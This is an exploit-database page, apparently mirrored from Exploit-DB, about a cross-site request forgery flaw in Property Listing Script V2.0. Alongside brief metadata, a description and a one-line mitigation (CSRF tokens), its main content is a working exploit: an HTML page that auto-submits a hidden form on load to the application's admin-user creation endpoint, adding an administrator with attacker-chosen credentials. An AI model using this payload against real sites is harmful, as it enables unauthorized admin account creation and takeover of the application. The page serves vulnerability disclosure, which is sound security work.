header-logo
Suggest Exploit
vendor:
Property Listing Script
by:
HackXBack
8,8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: Property Listing Script
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpjabbers:property_listing_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Property Listing Script V2.0 – Add Admin CSRF Vulnerability

A Cross Site Request Forgery (CSRF) vulnerability exists in Property Listing Script V2.0, which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page that contains a form with hidden fields and submit it to the vulnerable application. This will add an admin user to the application with the credentials specified in the form fields.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.
Source

Exploit-DB raw data:

Property Listing Script V2.0 - Add Admin CSRF Vulnerability
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/property-listing-script/
####################################################################

===[ Exploit ]===

Cross Site Request Forgery
==========================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminUsers&action=create"
enctype="multipart/form-data">
<input type="hidden" name="user_create" value="1" />
<input type="hidden" name="full_name" value="Iphobos" />
<input type="hidden" name="username" value="Admin" />
<input type="hidden" name="password" value="Password" />
<input type="hidden" name="status" value="T" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

####################################################################